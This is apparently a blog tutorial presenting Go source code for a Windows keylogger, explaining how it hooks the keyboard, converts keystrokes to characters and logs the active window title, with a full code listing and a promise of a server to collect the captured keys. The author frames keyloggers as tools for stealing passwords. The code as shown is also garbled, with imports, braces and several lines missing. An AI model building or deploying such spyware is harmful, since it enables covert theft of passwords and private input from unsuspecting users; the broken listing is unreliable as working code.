What is a Keylogger

a computer program that records every keystroke made by a computer user, especially in order to gain fraudulent access to passwords and other confidential information.

Code Explanation:


import (



The 4 most important imported modules are syscall, github.com/moutend/go-hook/pkg/keyboard, github.com/moutend/go-hook/pkg/types, and golang.org/x/sys/windows

go-hook is package by github user moutend that allows you to directly interface with low level windows keyboard hooks. Package windows and syscall contain an interface to the low-level operating system primitives.


  • mod: store the loaded user32.dll library

    mod = windows.NewLazyDLL("user32.dll")
  • procGetKeyState: store the function GetKeyState from user32.dll. This function gets the state of the specified key (is the specified key pressed or not)

    procGetKeyState         = mod.NewProc("GetKeyState")
  • procGetKeyboardLayout: store the function GetKeyboardLayout from user32.dll. This function gets the layout of the current keyboard

    procGetKeyboardLayout   = mod.NewProc("GetKeyboardLayout")
  • procGetKeyboardState: store the function GetKeyboardState from user32.dll. This function gets the state of the entire keyboard (which keys are pressed)

    procGetKeyboardState    = mod.NewProc("GetKeyboardState")
  • procGetForegroundWindow: store the function GetForegroundWindow from user32.dll. This function gets the current foreground window

    procGetForegroundWindow = mod.NewProc("GetForegroundWindow")
  • procToUnicodeEx: store the function ToUnicodeEx from user32.dll. This function converts scancodes returned by our keyboard hook to unicode

    procToUnicodeEx         = mod.NewProc("ToUnicodeEx")
  • procGetWindowText: store the function GetWindowText from user32.dll. This function gets the text of the window specified

    procGetWindowText       = mod.NewProc("GetWindowTextW")
  • procGetWindowTextLength: store the function GetWindowTextLength from user32.dll. This function gets the length of the text of a specified window

    procGetWindowTextLength = mod.NewProc("GetWindowTextLengthW")
var (
	mod = windows.NewLazyDLL("user32.dll")

	procGetKeyState         = mod.NewProc("GetKeyState")
	procGetKeyboardLayout   = mod.NewProc("GetKeyboardLayout")
	procGetKeyboardState    = mod.NewProc("GetKeyboardState")
	procGetForegroundWindow = mod.NewProc("GetForegroundWindow")
	procToUnicodeEx         = mod.NewProc("ToUnicodeEx")
	procGetWindowText       = mod.NewProc("GetWindowTextW")
	procGetWindowTextLength = mod.NewProc("GetWindowTextLengthW")


  • HANDLE: uintptr type for HWND.
  • HWND: HANDLE type for storing window hwnd.
type (
	HANDLE uintptr


func GetWindowTextLength(hwnd HWND) int {
	ret, _, _ := procGetWindowTextLength.Call(

	return int(ret)

GetWindowTextLength is a function that takes the HWND of the window and returns the length of the window text.

func GetWindowText(hwnd HWND) string {
	textLen := GetWindowTextLength(hwnd) + 1

	buf := make([]uint16, textLen)

	return syscall.UTF16ToString(buf)

GetWindowText is a function that takes the HWND of the window and returns the windows’ text by storing it in a buffer then converting it to a string.

func GetForegroundWindow() uintptr {
	hwnd, _, _ := procGetForegroundWindow.Call()
	return hwnd

GetForegroundWindow is a function that returns the currently focused window.

func Run(key_out chan rune, window_out chan string) error {
	// Buffer size is depends on your need. The 100 is placeholder value.
	keyboardChan := make(chan types.KeyboardEvent, 1024)

	if err := keyboard.Install(nil, keyboardChan); err != nil {
		return err

	defer keyboard.Uninstall()

	signalChan := make(chan os.Signal, 1)
	signal.Notify(signalChan, os.Interrupt)

	fmt.Println("start capturing keyboard input")

	for {
		select {
		case <-signalChan:
			fmt.Println("Received shutdown signal")
			return nil
		case k := <-keyboardChan:
			if hwnd := GetForegroundWindow(); hwnd != 0 {
				if k.Message == types.WM_KEYDOWN {
					key_out <- VKCodeToAscii(k)
					window_out <- GetWindowText(HWND(hwnd))

Function Run() runs the keylogger.

How it works:

First initialize a buffered channel to store keyboard events then install the low level keyboard hook using keyboard.Install().
defer uninstallation of the hook so that it gets uninstalled when the function returns. Then in an infinite for loop get the foreground window using GetForegroundWindow() and when a key is pressed send the key to the key_out channel and the window name to window_out channel.

func VKCodeToAscii(k types.KeyboardEvent) rune {
	var buffer []uint16 = make([]uint16, 256)
	var keyState []byte = make([]byte, 256)

	n := 10
	n |= (1 << 2)


	r1, _, _ := procGetKeyboardLayout.Call(0)

	procToUnicodeEx.Call(uintptr(k.VKCode), uintptr(k.ScanCode), uintptr(unsafe.Pointer(&keyState[0])),
		uintptr(unsafe.Pointer(&buffer[0])), 256, uintptr(n), r1)

	if len(syscall.UTF16ToString(buffer)) > 0 {
		return []rune(syscall.UTF16ToString(buffer))[0]
	return rune(0)

Function VKCodeToAscii converts from Virtual-Key Code to ASCII

How it works

First initialize two buffers one for storing the result and one for storing the keyboard state, Then get the key state of the pressed key because that’s the only way the rest of the function will work trust me try removing that line and it’ll return innacurate results. After that get the keyboard state and store it in the buffer we created, Then Call ToUnicodeEx to convert from VKCode to unicode. Then return the result if the length of the result buffer is larger than 0.

Final Code:

package main

import (



var (
	mod = windows.NewLazyDLL("user32.dll")

	procGetKeyState         = mod.NewProc("GetKeyState")
	procGetKeyboardLayout   = mod.NewProc("GetKeyboardLayout")
	procGetKeyboardState    = mod.NewProc("GetKeyboardState")
	procGetForegroundWindow = mod.NewProc("GetForegroundWindow")
	procToUnicodeEx         = mod.NewProc("ToUnicodeEx")
	procGetWindowText       = mod.NewProc("GetWindowTextW")
	procGetWindowTextLength = mod.NewProc("GetWindowTextLengthW")

type (
	HANDLE uintptr

// Gets length of text of window text by HWND
func GetWindowTextLength(hwnd HWND) int {
	ret, _, _ := procGetWindowTextLength.Call(

	return int(ret)

// Gets text of window text by HWND
func GetWindowText(hwnd HWND) string {
	textLen := GetWindowTextLength(hwnd) + 1

	buf := make([]uint16, textLen)

	return syscall.UTF16ToString(buf)

// Gets current foreground window
func GetForegroundWindow() uintptr {
	hwnd, _, _ := procGetForegroundWindow.Call()
	return hwnd

// Runs the keylogger
func Run(key_out chan rune, window_out chan string) error {
	keyboardChan := make(chan types.KeyboardEvent, 1024)

	if err := keyboard.Install(nil, keyboardChan); err != nil {
		return err

	defer keyboard.Uninstall()

	signalChan := make(chan os.Signal, 1)
	signal.Notify(signalChan, os.Interrupt)

	fmt.Println("start capturing keyboard input")

	for {
		select {
		case <-signalChan:
			fmt.Println("Received shutdown signal")
			return nil
		case k := <-keyboardChan:
			if hwnd := GetForegroundWindow(); hwnd != 0 {
				if k.Message == types.WM_KEYDOWN {
					key_out <- VKCodeToAscii(k)
					window_out <- GetWindowText(HWND(hwnd))

// Converts from Virtual-Keycode to Ascii rune
func VKCodeToAscii(k types.KeyboardEvent) rune {
	var buffer []uint16 = make([]uint16, 256)
	var keyState []byte = make([]byte, 256)

	n := 10
	n |= (1 << 2)


	r1, _, _ := procGetKeyboardLayout.Call(0)

	procToUnicodeEx.Call(uintptr(k.VKCode), uintptr(k.ScanCode), uintptr(unsafe.Pointer(&keyState[0])),
		uintptr(unsafe.Pointer(&buffer[0])), 256, uintptr(n), r1)

	if len(syscall.UTF16ToString(buffer)) > 0 {
		return []rune(syscall.UTF16ToString(buffer))[0]
	return rune(0)
In the next post i’ll be talking about how to create a server to receive keystrokes and log them

Please check out my project AKILT